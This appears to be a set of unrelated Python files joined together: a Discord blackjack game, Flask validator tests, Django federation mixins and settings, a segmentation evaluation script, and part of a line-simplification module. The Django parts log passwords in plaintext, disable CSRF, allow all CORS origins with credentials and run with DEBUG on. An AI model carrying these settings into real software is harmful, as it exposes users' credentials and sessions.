~~~~~~~~~~~~~~~~~
Bruh moment
:copyright: (c) 2021-2021 M2rsho
:license: MIT, see LICENSE for more details.
"""
from discord.ext import commands
import discord
from discord.ext.commands.core import is_owner
import support
from discord.ext.commands import cooldown, BucketType
import random
from math import ceil
from cogs import checks
# Blackjack card values as (label, value) pairs so random.choice can draw a
# card directly.  Aces always count as 1 (no soft-ace handling); face cards
# count as 10.
cards = [
    ("A", 1),
    ("2", 2),
    ("3", 3),
    ("4", 4),
    ("5", 5),
    ("6", 6),
    ("7", 7),
    ("8", 8),
    ("9", 9),
    ("10", 10),
    ("J", 10),
    ("Q", 10),
    ("K", 10),
]
class createButtons(discord.ui.View):
    """Interactive blackjack view with Hit / Stand / Resign buttons.

    One instance per game; only ``author`` may press the buttons.  The view
    times out after 30 seconds, which disables all buttons.
    """

    def __init__(self, client, author, bet, language):
        super().__init__(timeout=30)
        self.client = client
        self.author = author      # the player who started the game
        self.message = None       # assigned by the command after the reply is sent
        self.bet = bet
        self.dealerValue = 0      # current total of the dealer's hand
        self.dealerDeck = None    # rendered display string of the dealer's hand
        self.dealerCards = []     # list of (label, value) pairs
        self.userValue = 0
        self.userDeck = None
        self.userCards = []
        self.lang = language      # language dictionary for all user-facing text

    async def on_timeout(self) -> None:
        # Disable all three buttons and refresh the message so the game is
        # visibly over.  NOTE(review): assumes self.message was assigned
        # before the timeout fires — confirm the command always sets it.
        self.hit.disabled = True
        self.stand.disabled = True
        self.resign.disabled = True
        await self.message.edit(view=self)
        return await super().on_timeout()

    @discord.ui.button(label="Hit", style=discord.ButtonStyle.grey)
    async def hit(self, button: discord.ui.Button, interaction: discord.Interaction):
        # Draw one card for the player and re-render the game message.
        if interaction.user.id != self.author.id:
            await interaction.response.send_message(self.lang["notYourMenu"], ephemeral=True)
            return
        card = random.choice(cards)
        self.userCards.append(card)
        await self.updateCards(interaction)

    @discord.ui.button(label="Stand", style=discord.ButtonStyle.grey)
    async def stand(self, button: discord.ui.Button, interaction: discord.Interaction):
        # Finish the game: the dealer draws to at least 17, then hands are
        # compared and the message is edited with the outcome.
        if interaction.user.id != self.author.id:
            await interaction.response.send_message(self.lang["notYourMenu"], ephemeral=True)
            return
        while self.dealerValue <= 16:
            self.dealerCards.append(random.choice(cards))
            self.dealerDeck, self.dealerValue = await self.renderCards(self.dealerCards)
        if self.dealerValue > 21:
            # Dealer busts: the player wins.
            # NOTE(review): the message shows a social-credit-scaled amount
            # but the payout below is bet + ceil(bet) — confirm which is
            # intended.
            await interaction.response.edit_message(
                content=self.lang["commands"]["blackjack"]["won"].format(value=str(ceil(self.bet*(support.globalData.getSocialCreditSync(interaction.user)/1000)))),
                embed=discord.Embed(
                    description=self.lang["commands"]["blackjack"]["menu"].format(
                        userDeck=str(self.userDeck),
                        userValue=str(self.userValue),
                        dealerCards=str(self.dealerDeck),
                        dealerValue=str(self.dealerValue)
                    ),
                    colour=support.colours.green))
            await support.globalData.addBalance(self.author, self.bet+ceil(self.bet))
        elif self.dealerValue == self.userValue:
            # Push: the stake is returned.
            await interaction.response.edit_message(
                content=self.lang["commands"]["blackjack"]["tie"],
                embed=discord.Embed(
                    description=self.lang["commands"]["blackjack"]["menu"].format(
                        userDeck=str(self.userDeck),
                        userValue=str(self.userValue),
                        dealerCards=str(self.dealerDeck),
                        dealerValue=str(self.dealerValue)
                    ),
                    colour=support.colours.yellow))
            await support.globalData.addBalance(self.author, self.bet)
        elif self.dealerValue > self.userValue:
            # Dealer wins: the stake (already withdrawn) is lost.
            await interaction.response.edit_message(
                content=self.lang["commands"]["blackjack"]["lost"].format(value=str(self.bet)),
                embed=discord.Embed(
                    description=self.lang["commands"]["blackjack"]["menu"].format(
                        userDeck=str(self.userDeck),
                        userValue=str(self.userValue),
                        dealerCards=str(self.dealerDeck),
                        dealerValue=str(self.dealerValue)
                    ),
                    colour=support.colours.red))
        elif self.dealerValue < self.userValue:
            # Player wins on points.
            await interaction.response.edit_message(
                content=self.lang["commands"]["blackjack"]["won"].format(value=str(ceil(self.bet*(support.globalData.getSocialCreditSync(interaction.user)/1000)))),
                embed=discord.Embed(
                    description=self.lang["commands"]["blackjack"]["menu"].format(
                        userDeck=str(self.userDeck),
                        userValue=str(self.userValue),
                        dealerCards=str(self.dealerDeck),
                        dealerValue=str(self.dealerValue)
                    ),
                    colour=support.colours.green))
            await support.globalData.addBalance(self.author, self.bet+ceil(self.bet))
        await self.on_timeout()
        self.stop()

    @discord.ui.button(label="Resign", style=discord.ButtonStyle.red)
    async def resign(self, button: discord.ui.Button, interaction: discord.Interaction):
        # Forfeit the game; the stake is not returned.
        if interaction.user.id != self.author.id:
            await interaction.response.send_message(self.lang["notYourMenu"], ephemeral=True)
            return
        await self.on_timeout()
        self.stop()

    async def updateCards(self, interaction):
        # Re-render after a hit: bust check, five-card win, or continue with
        # the dealer's second card still hidden.
        self.userDeck, self.userValue = await self.renderCards(self.userCards)
        if self.userValue > 21:
            # Player busts.
            await interaction.response.edit_message(
                content=self.lang["commands"]["blackjack"]["lost"].format(value=str(self.bet)),
                embed=discord.Embed(
                    description=self.lang["commands"]["blackjack"]["menu"].format(
                        userDeck=str(self.userDeck),
                        userValue=str(self.userValue),
                        dealerCards=str(self.dealerDeck),
                        dealerValue=str(self.dealerValue)
                    ),
                    colour=support.colours.red))
            await self.on_timeout()
            self.stop()
        elif self.dealerValue < 21 and len(self.userCards) >= 5:
            # Five-card hand without busting wins outright.
            await interaction.response.edit_message(
                content=self.lang["commands"]["blackjack"]["won"].format(value=str(ceil(self.bet*(support.globalData.getSocialCreditSync(interaction.user)/1000)))),
                embed=discord.Embed(
                    description=self.lang["commands"]["blackjack"]["menu"].format(
                        userDeck=str(self.userDeck),
                        userValue=str(self.userValue),
                        dealerCards=str(self.dealerDeck),
                        dealerValue=str(self.dealerValue)
                    ),
                    colour=support.colours.green))
            await support.globalData.addBalance(self.author, self.bet+ceil(self.bet))
            await self.on_timeout()
            self.stop()
        else:
            # Game continues: show only the dealer's first card.
            await interaction.response.edit_message(embed=discord.Embed(
                description=self.lang["commands"]["blackjack"]["menu"].format(
                    userDeck=str(self.userDeck),
                    userValue=str(self.userValue),
                    dealerCards=str(self.dealerCards[0][0]+', ?'),
                    dealerValue=str(self.dealerCards[0][1])
                ),
                colour=support.colours.default))

    async def renderCards(self, cards):
        # Return (display string, hand total) for a list of (label, value)
        # pairs.  NOTE(review): aces are always counted as 1 here.
        return ''.join(f"{card[0]}, " for card in cards)[:-2] + '.', sum([int(card[1]) for card in cards])
class blackjack(commands.Cog):
    """Blackjack gambling command for the bot's economy system."""

    def __init__(self, client):
        self.client = client

    @checks.default()
    @cooldown(1, support.cooldown, BucketType.user)
    @commands.command(description=support.getDescription("en.json", "blackjack"), aliases=["bj"])
    async def blackjack(self, ctx, bet):
        """Start a blackjack game for *bet* currency ("max"/"all" bets everything)."""
        current = await support.globalData.getBalance(ctx.message.author)
        lang = support.getLanguageFileG(ctx.guild)
        if bet.lower() == "max" or bet.lower() == "all":
            bet = current
        else:
            # NOTE(review): float(bet) raises an unlocalised ValueError on
            # non-numeric input — confirm a global error handler covers it.
            bet = float(bet)
        if current < bet:
            raise ValueError(lang["commands"]["blackjack"]["notEnoughMoney"])
        elif bet <= 0:
            raise ValueError(lang["commands"]["blackjack"]["tooLowBet"])
        # Take the stake up front; winnings are paid back by the view.
        # NOTE(review): 'removebalance' breaks the camelCase convention of
        # 'addBalance'/'getBalance' — confirm the support API name.
        await support.globalData.removebalance(ctx.message.author, bet)
        view = createButtons(self.client, ctx.message.author, bet, lang)
        # Both sides start with two cards; only the dealer's first is shown.
        dealerCards = random.choices(cards, k=2)
        userCards = random.choices(cards, k=2)
        view.dealerCards = dealerCards
        view.userCards = userCards
        view.userDeck, view.userValue = await view.renderCards(userCards)
        view.dealerDeck, view.dealerValue = await view.renderCards(dealerCards)
        message = await ctx.reply(mention_author=False, embed=discord.Embed(
            description=lang["commands"]["blackjack"]["menu"].format(
                userDeck=str(view.userDeck),
                userValue=str(view.userValue),
                dealerCards=str(view.dealerCards[0][0]+ ', ?'),
                dealerValue=str(view.dealerCards[0][1])
            ),
            colour=support.colours.default
        ), view=view)
        # Needed by the view's on_timeout handler.
        view.message = message
def setup(bot):
    """Extension entry point: register the blackjack cog with the bot."""
    bot.add_cog(blackjack(bot))
|
import pytest
from flask import url_for
from wtforms.validators import ValidationError
from registry.donor.models import DonorsOverview
from registry.utils import NumericValidator
from .helpers import FakeForm, login
class TestNumericValidator:
    """Unit tests for NumericValidator (exact length + digits-only checks)."""

    def test_length_validation(self):
        v = NumericValidator(5)
        f = FakeForm()
        # A value of exactly five digits passes silently.
        f.field.data = "12345"
        v(f, f.field)
        # Too long and too short both raise with the length message.
        for bad in ("11111111111", "0"):
            f.field.data = bad
            with pytest.raises(ValidationError, match="^Pole musí mít právě 5 znaků$"):
                v(f, f.field)

    def test_numeric_validation(self):
        v = NumericValidator(5)
        f = FakeForm()
        f.field.data = "12345"
        v(f, f.field)
        # Any non-digit character triggers the numeric message.
        for bad in ("1234a", "0x123"):
            f.field.data = bad
            with pytest.raises(
                ValidationError, match="^Pole musí obsahovat pouze číslice$"
            ):
                v(f, f.field)

    def test_messages(self):
        # Custom messages override the defaults.
        v = NumericValidator(5, msg_numeric="numeric", msg_length="length")
        f = FakeForm()
        f.field.data = "abcde"
        with pytest.raises(ValidationError, match="^numeric$"):
            v(f, f.field)
        f.field.data = "1"
        with pytest.raises(ValidationError, match="^length$"):
            v(f, f.field)

    def test_plural(self):
        # The Czech noun in the message is declined according to the length.
        f = FakeForm()
        f.field.data = "11111111111"
        expectations = (
            (5, "^Pole musí mít právě 5 znaků$"),
            (3, "^Pole musí mít právě 3 znaky$"),
            (1, "^Pole musí mít právě 1 znak$"),
        )
        for length, pattern in expectations:
            with pytest.raises(ValidationError, match=pattern):
                NumericValidator(length)(f, f.field)
class TestCapitalizer:
    """Tests for the Jinja 'capitalize' filter and its use in donor pages."""

    # Idiom fix: the parametrized argument was named 'input', shadowing the
    # builtin; renamed to 'value'.
    @pytest.mark.parametrize(
        ("value", "expected"),
        (
            ("karlov", "karlov"),
            ("Karlov", "Karlov"),
            ("KARLOV", "Karlov"),
            ("Velké KARLOVICE", "Velké Karlovice"),
            ("velké karlovice", "velké karlovice"),
            ("VELKÉ karlovice", "Velké karlovice"),
            ("VELKÉ KARLOVICE", "Velké Karlovice"),
            ("a b c d", "a b c d"),
            ("A B C D", "A B C D"),
            ("a B c D", "a B c D"),
            ("U LÍPY", "U Lípy"),
            ("u lípy", "u lípy"),
            ("U Lípy", "U Lípy"),
            ("Frýdlant nad Ostravicí", "Frýdlant nad Ostravicí"),
            ("FRÝDLANT NAD OSTRAVICÍ", "Frýdlant Nad Ostravicí"),
        ),
    )
    def test_capitalize(self, testapp, value, expected):
        """Only words written in ALL CAPS are re-capitalized."""
        capitalize = testapp.app.jinja_env.filters["capitalize"]
        output = capitalize(value)
        assert output == expected

    def test_capitalize_in_templates(self, user, testapp, db):
        """Donor pages render capitalized names/addresses, never raw ALL CAPS."""
        rodne_cislo = "1234567890"
        do = DonorsOverview(
            rodne_cislo=rodne_cislo,
            first_name="KAREL",
            last_name="VOMÁČKA",
            address="LIPOVÁ 33",
            city="OSTRAVA",
            postal_code="71600",
            kod_pojistovny="213",
            donation_count_fm=50,
            donation_count_fm_bubenik=50,
            donation_count_trinec=50,
            donation_count_mp=50,
            donation_count_manual=50,
            donation_count_total=250,
            awarded_medal_br=False,
            awarded_medal_st=False,
            awarded_medal_zl=False,
            awarded_medal_kr3=False,
            awarded_medal_kr2=False,
            awarded_medal_kr1=False,
            awarded_medal_plk=False,
        )
        db.session.add(do)
        db.session.commit()
        login(user, testapp)
        pages = (
            ("donor.detail", {"rc": rodne_cislo}),
            ("donor.award_prep", {"medal_slug": "br"}),
            ("donor.render_award_document", {"rc": rodne_cislo, "medal_slug": "br"}),
        )
        for page, params in pages:
            res = testapp.get(url_for(page, **params))
            assert "KAREL" not in res
            assert "VOMÁČKA" not in res
            assert "Karel" in res
            assert "Vomáčka" in res
            # The award document omits the address fields.
            if "award_document" not in page:
                assert "LIPOVÁ 33" not in res
                assert "OSTRAVA" not in res
                assert "Lipová 33" in res
                assert "Ostrava" in res
|
from .. import models
import aiohttp
import asyncio
from django.conf import settings
from django.urls import reverse_lazy
from urllib.parse import urlparse
import uuid
import base64
from django.contrib.auth.models import User
class MixinContext(object):
    """View mixin: expose the logged-in user's Author profile to templates."""

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        user = self.request.user
        if user.is_authenticated:
            context['ActiveUser'] = user.author
        return context
class MixinIndex(object):
    """Index-view mixin: refreshes local and remote feeds before rendering
    and puts the post list into the template context."""

    async def refresh_feed(self, session, active_user, url):
        """Pull the user's GitHub event feed and mirror new events as Posts.

        Events already imported (matched by correlationId) are skipped;
        per-item failures are printed and otherwise ignored (best-effort).
        """
        async with session.get(url) as req:
            data = await req.json()
            for item in data:
                try:
                    itemId = int(item["id"])
                    # Skip events that were already mirrored.
                    if models.Post.objects.filter(correlationId=itemId):
                        continue
                    title = item['type']
                    description = "about Github"
                    content = "No Content"
                    timeAt = item["created_at"]
                    if title == "PushEvent":
                        description = f"I just pushed to my repository {item['repo']['name']}"
                    elif title == "ForkEvent":
                        description = f"I just forked {item['repo']['name']}"
                    elif title == "CreateEvent":
                        description = f"I just created {item['repo']['name']}"
                    title = "about Github"
                    post = models.Post(author=active_user,
                                       origin=settings.SITE_URL,
                                       source=settings.SITE_URL,
                                       title=title,
                                       description=description,
                                       content=content,
                                       contentType="text/markdown",
                                       published=timeAt,
                                       correlationId = itemId,
                                       unlisted=False
                                       )
                    # Save once to obtain a primary key, then rewrite
                    # source/origin to the canonical API URL and save again.
                    post.save()
                    post.source = f"{settings.SITE_URL}{reverse_lazy('api-post', kwargs={'pk': post.id})}"
                    post.origin = post.source
                    post.save()
                except Exception as e:
                    # NOTE(review): errors are only printed; confirm the
                    # silent best-effort import is intended.
                    print(e)

    async def refresh_async(self, active_user):
        """Refresh the user's GitHub feed and pull every known remote node."""
        async with aiohttp.ClientSession() as session:
            outstanding = []
            if active_user:
                outstanding.append(self.refresh_feed(session, active_user, active_user.feed))
            for node in models.Node.objects.all():
                outstanding.append(node.pull(active_user, session))
            if outstanding:
                # NOTE(review): asyncio.wait with bare coroutines is
                # deprecated since Python 3.8 — consider asyncio.gather.
                await asyncio.wait(outstanding)

    def get_context_data(self, **kwargs):
        """Run the async refresh synchronously, then expose 'Posts' (and
        'ActiveUser' when authenticated) to the template context."""
        context = super().get_context_data(**kwargs)
        if self.request.user.is_authenticated:
            author = self.request.user.author
            context['ActiveUser'] = author
            # A fresh event loop per request; closed after the refresh.
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)
            loop.run_until_complete(self.refresh_async(author))
            loop.close()
            context['Posts'] = author.get_all_posts()[:100]
        else:
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)
            loop.run_until_complete(self.refresh_async(None))
            loop.close()
            # NOTE(review): public_user() is not defined in this mixin —
            # presumably provided by the concrete view class; confirm.
            context['Posts'] = self.public_user()
        return context
# Django already provides this via the built-in UserPassesTestMixin and its
# test_func hook.
class DenyAcess(object):
    """Stub mixin for denying access (currently a no-op).

    NOTE(review): the class name misspells "Access"; kept for compatibility
    with existing references.
    """

    def deny(self):
        """Do nothing; reserved for future access-denial logic."""
        pass
async def fetchUser(url, node):
    """Fetch a remote author at *url* from *node* using a fresh HTTP session."""
    async with aiohttp.ClientSession() as session:
        return await node.fetchRemoteAuthor(url, session, True)
async def refreshUser(author, node):
    """Refresh a locally-known remote *author* from *node* using a fresh session."""
    async with aiohttp.ClientSession() as session:
        return await node.refreshRemoteAuthor(author, session, True)
class MixinCreateAuthor(object):
    """Mixin resolving an author payload to a local Author record, fetching
    or refreshing it from the owning remote node as needed."""

    def createAuthor(self,author,requestType):
        """Return the (possibly refreshed) Author for ``author["url"]``.

        The author id is taken as the last path segment of the URL.
        Raises Exception when the URL does not belong to any known node and
        the author is not already stored locally.
        NOTE(review): *requestType* is unused here — confirm it can be dropped.
        """
        author_url = author["url"]
        path = urlparse(author_url).path
        author_id = None
        if path:
            author_id = path.split('/')[-1]
        # NOTE(review): with an empty path, author_id stays None and the
        # filter below is queried with pk=None — confirm that case cannot
        # occur upstream.
        if models.Author.objects.filter(pk=author_id).exists():
            remoteAuthor = models.Author.objects.get(pk=author_id)
            node = generic_find_node(author_url)
            if node:
                # Known author from a known node: refresh its data.
                loop = asyncio.new_event_loop()
                asyncio.set_event_loop(loop)
                remoteAuthor = loop.run_until_complete(refreshUser(remoteAuthor, node))
                loop.close()
        else:
            # Unknown author: fetch it from the node that owns the URL.
            node = generic_find_node(author_url)
            if not node:
                raise Exception("Node not found")
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)
            remoteAuthor = loop.run_until_complete(fetchUser(author_url, node))
            loop.close()
        return remoteAuthor
class MixinCheckServer(object):
    """Mixin validating HTTP Basic credentials presented by peer nodes."""

    def checkserver(self, server):
        """Validate an ``Authorization`` header value (*server*).

        Returns True when node-to-node limiting is disabled, or when the
        basic-auth username matches a known node and the password matches
        that node's stored password; False otherwise.
        Raises Exception when the header is missing.
        """
        if settings.LIMIT_NODE_TO_NODE_CONNECTIONS:
            if not server:
                raise Exception("No Authorization Header")
            server = server.split(' ')
            basic = server[0]   # scheme token, e.g. "Basic" (not verified)
            auth = server[-1]   # base64-encoded credential part
            # Credentials are "username:password"; rpartition tolerates
            # colons inside the username.
            username, _, password = base64.b64decode(auth).decode("utf-8").rpartition(':')
            print(username)
            password = password.strip()
            # NOTE(review): the following lines log and compare the password
            # in plaintext — consider hashed storage and removing the debug
            # prints before production use.
            print(f"{password}:{len(password)}")
            node = generic_find_node(username)
            if node:
                print("Found node")
                print(node)
                print(f"{node.password}:{len(node.password)}")
                if node.password == password:
                    return True
                else:
                    return False
            print("No Node")
            return False
        else:
            return True
def generic_find_node(url) -> models.Node:
    """Return the registered Node whose host matches *url*'s scheme + host.

    Returns None when no node matches (callers already test for falsiness;
    the original fell off the end implicitly and printed debug output for
    every node — both cleaned up here).
    """
    proto, host = urlparse(url)[0:2]
    target = f"{proto}://{host}"
    for node in models.Node.objects.all():
        if node.host == target:
            return node
    return None
<filename>test_CCAI.py<gh_stars>0
from comet_ml import Experiment
import argparse
import os
import os.path as osp
import pprint
import random
import warnings
from pathlib import Path
import numpy as np
import yaml
import torch
from torch import nn
from advent.model.deeplabv2 import get_deeplab_v2
from test_save_scripts import eval_best
from advent.utils.datasets import get_loader
from advent.utils.tools import (
load_opts,
set_mode,
# avg_duration,
flatten_opts,
print_opts
)
# from time import time
# Silence the harmless numpy binary-compatibility notice...
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
# ...and then ALL remaining warnings.  NOTE(review): this blanket filter
# hides genuinely useful warnings — confirm it is intended.
warnings.filterwarnings("ignore")
def get_arguments(argv=None):
    """
    Parse input arguments.

    Args:
        argv: optional list of argument strings; defaults to ``sys.argv[1:]``.
              The parameter is new and defaults to the original behaviour —
              passing a list makes the function testable without touching
              sys.argv.

    Returns:
        argparse.Namespace with cfg, random_train, viz_every_iter,
        exp_suffix, data and no_check.
    """
    parser = argparse.ArgumentParser(description="Code for domain adaptation (DA) training")
    parser.add_argument('--cfg', type=str, default="shared/advent.yml",
                        help='optional config file', )
    parser.add_argument("--random-train", action="store_true",
                        help="not fixing random seed.")
    parser.add_argument("--viz-every-iter", type=int, default=None,
                        help="visualize results.")
    parser.add_argument("--exp-suffix", type=str, default=None,
                        help="optional experiment suffix")
    parser.add_argument(
        "-d",
        "--data",
        help="yaml file for the data",
        default="shared/config.yml",
    )
    parser.add_argument(
        "-n",
        "--no_check",
        action="store_true",
        default=False,
        help="Prevent sample existence checking for faster dev",
    )
    return parser.parse_args(argv)
def main():
    """Entry point: load config, restore the model and evaluate the best checkpoint."""
    # --------------------------
    # ----- Load Options -----
    # --------------------------
    args = get_arguments()
    print('Called with args:')
    print(args)
    assert args.cfg is not None, 'Missing cfg file'
    root = Path(__file__).parent.resolve()
    cfg = load_opts(path=root / args.cfg, default="shared/config.yml")
    cfg = set_mode("train", cfg)
    flats = flatten_opts(cfg)
    print_opts(flats)
    # Evaluation runs with the model in eval mode and batch size 1.
    cfg.model.is_train = False
    cfg.data.loaders.batch_size = 1
    comet_exp = Experiment(workspace=cfg.workspace, project_name=cfg.project_name)
    flats = flatten_opts(cfg)
    comet_exp.log_parameters(flats)
    # auto-generate exp name if not specified
    if cfg.EXP_NAME == '':
        cfg.EXP_NAME = f'{cfg.SOURCE}2{cfg.TARGET}_{cfg.TRAIN.MODEL}_{cfg.TRAIN.DA_METHOD}'
    if args.exp_suffix:
        cfg.EXP_NAME += f'_{args.exp_suffix}'
    # auto-generate snapshot path if not specified
    if cfg.TRAIN.SNAPSHOT_DIR == '':
        cfg.TRAIN.SNAPSHOT_DIR = osp.join(cfg.EXP_ROOT_SNAPSHOT, cfg.EXP_NAME)
        os.makedirs(cfg.TRAIN.SNAPSHOT_DIR, exist_ok=True)
    print('Using config:')
    pprint.pprint(cfg)
    # INIT: fix all RNG seeds unless --random-train was given.
    _init_fn = None
    if not args.random_train:
        torch.manual_seed(cfg.TRAIN.RANDOM_SEED)
        torch.cuda.manual_seed(cfg.TRAIN.RANDOM_SEED)
        np.random.seed(cfg.TRAIN.RANDOM_SEED)
        random.seed(cfg.TRAIN.RANDOM_SEED)

        def _init_fn(worker_id):
            # Per-worker seeding for DataLoader workers.
            np.random.seed(cfg.TRAIN.RANDOM_SEED + worker_id)
    # Escape hatch for CI / smoke tests: stop before touching checkpoints.
    if os.environ.get('ADVENT_DRY_RUN', '0') == '1':
        return
    # LOAD SEGMENTATION NET
    assert osp.exists(cfg.TRAIN.RESTORE_FROM), f'Missing init model {cfg.TRAIN.RESTORE_FROM}'
    if cfg.TRAIN.MODEL == 'DeepLabv2':
        model = get_deeplab_v2(num_classes=cfg.NUM_CLASSES, multi_level=cfg.TRAIN.MULTI_LEVEL)
        saved_state_dict = torch.load(cfg.TRAIN.RESTORE_FROM)
        if 'DeepLab_resnet_pretrained_imagenet' in cfg.TRAIN.RESTORE_FROM:
            # ImageNet-pretrained backbone: copy everything except the
            # classifier head ('layer5'), stripping the leading module name.
            new_params = model.state_dict().copy()
            for i in saved_state_dict:
                i_parts = i.split('.')
                if not i_parts[1] == 'layer5':
                    new_params['.'.join(i_parts[1:])] = saved_state_dict[i]
            model.load_state_dict(new_params)
        else:
            model.load_state_dict(saved_state_dict)
    else:
        raise NotImplementedError(f"Not yet supported {cfg.TRAIN.MODEL}")
    print('Model loaded')
    #source_loader = get_loader(cfg, real=False, no_check=args.no_check)
    target_loader = get_loader(cfg, real=True, no_check=args.no_check)
    # Persist the effective configuration next to the snapshots.
    with open(osp.join(cfg.TRAIN.SNAPSHOT_DIR, 'train_cfg.yml'), 'w') as yaml_file:
        yaml.dump(cfg, yaml_file, default_flow_style=False)
    device = cfg.GPU_ID
    eval_best(cfg, model, device, target_loader, comet_exp, True)
# Standard script entry point.
if __name__ == '__main__':
    main()
<filename>app/server/server/settings.py
"""
Django settings for server project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import random
import string
from pathlib import Path
import json
import os
from module.manager.internal_database_concurrency_manager import InternalDatabaseConcurrencyManager
from module.specification.System_config import SystemConfig
config = None
# Load the installer-generated configuration; the app cannot run without it.
try:
    with open('server/config.json', 'r') as f:
        config = json.load(f)
except Exception:
    print("Config data is not setting, please back to `bin` directory and run command `perl install.pl install` ")
    # BUG FIX: exit with a non-zero status so callers can detect the
    # failure (the original called exit(0), signalling success).
    raise SystemExit(1)
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# The application is installed directly on the user's NAS, so the key is
# generated as 50 random characters (quotes and backslashes excluded) at
# startup.  NOTE(review): a new key per process restart invalidates signed
# cookies/sessions across restarts — confirm this is intended.
chars = ''.join([string.ascii_letters, string.digits, string.punctuation]). \
    replace('\'', '').replace('"', '').replace('\\', '')
SECRET_KEY = ''.join([random.SystemRandom().choice(chars) for i in range(50)])

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
# 'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
'corsheaders'
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware'
]
ROOT_URLCONF = 'server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# 'DIRS': [os.path.join(BASE_DIR, 'templates')],
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
"""
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'templates', 'static')
]
"""
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
WSGI_APPLICATION = 'server.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = None

# The backend depends on the RDBMS type chosen at install time.
try:
    if config["database"]["rdbms"]["type"] == "sqlite":
        DATABASES = {
            'default': {
                'ENGINE': 'django.db.backends.sqlite3',
                'NAME': BASE_DIR / 'db.sqlite3',
            }
        }
    elif config["database"]["rdbms"]["type"] == "mysql":
        DATABASES = {
            'default': {
                'ENGINE': config["database"]["rdbms"]["engine"],
                'NAME': config["database"]["rdbms"]["name"],
                'USER': config["database"]["rdbms"]["user"],
                'PASSWORD': config["database"]["rdbms"]["password"],
                'HOST': config["database"]["rdbms"]["host"],
                'PORT': str(config["database"]["rdbms"]["port"])
            }
        }
    else:
        # Robustness fix: an unknown type previously left DATABASES = None
        # silently; fail loudly through the handler below instead.
        raise ValueError(f'Unsupported RDBMS type: {config["database"]["rdbms"]["type"]}')
except Exception as e:
    print(e)
    # Typo fix: "illeagal" -> "illegal".
    print("config data has illegal data")
    print("please back to bin directory and run `perl install.pl install` again ")
    # BUG FIX: exit with a non-zero status (the original exited with 0).
    raise SystemExit(1)
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
# CORS
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
ALLOWED_HOSTS = [
'localhost',
'1192.168.3.11',
'0.0.0.0',
'[::1]',
]
"""
ALLOWED_HOSTS = [
config['system']['host'],
"0.0.0.0",
"[::1]"
]
"""
CORS_ALLOW_HEADERS = [
'Set-Cookie'
]
REST_FRAMEWORK = {
# datetime format 지정
'DATETIME_FORMAT': "%Y-%m-%d %H:%M:%S.%f%z",
}
SYSTEM_CONFIG: SystemConfig = SystemConfig()
INTERNAL_DATABASE_MANAGER: InternalDatabaseConcurrencyManager = \
InternalDatabaseConcurrencyManager(SYSTEM_CONFIG)
|
<filename>tgap_ng/edge_simplify/visvalingham_whyatt.py
from .. import pqdict
from math import fabs
from operator import itemgetter
from simplegeom.geometry import LineString
from .ontriangle import on_triangle, orient2d
def area(p0, p1, p2):
    """Return the (unsigned) area of the triangle spanned by p0, p1, p2."""
    # orient2d yields twice the signed area; halve it and drop the sign.
    return fabs(orient2d(p0, p1, p2)) * 0.5
def dist(pa, pb):
    """Return the Euclidean distance between points *pa* and *pb*.

    Bug fix: ``dy`` was computed as ``pb[1] - pb[1]`` (always zero), so the
    function silently returned only the horizontal distance ``|dx|``.  This
    skewed every "base length" computed in simplify(), and made vertical
    segments look like zero-length bases.
    """
    dx = pb[0] - pa[0]
    dy = pb[1] - pa[1]
    return (dx ** 2 + dy ** 2) ** 0.5
def output_points(pts, fh):
    """Write every point in *pts* as a WKT POINT, one per line, to *fh*."""
    for pt in pts:
        fh.write(f"POINT({pt[0]} {pt[1]})\n")
def simplify(line, pp, tolerance=float("inf"), DEBUG=False):
    """Simplifies a polyline with Visvalingham Whyatt algorithm,
    i.e. bottom up

    Interior vertices are removed one by one, smallest "effective measure"
    first (triangle area divided by half the base length), until the next
    candidate's measure exceeds *tolerance* or a minimum vertex count is
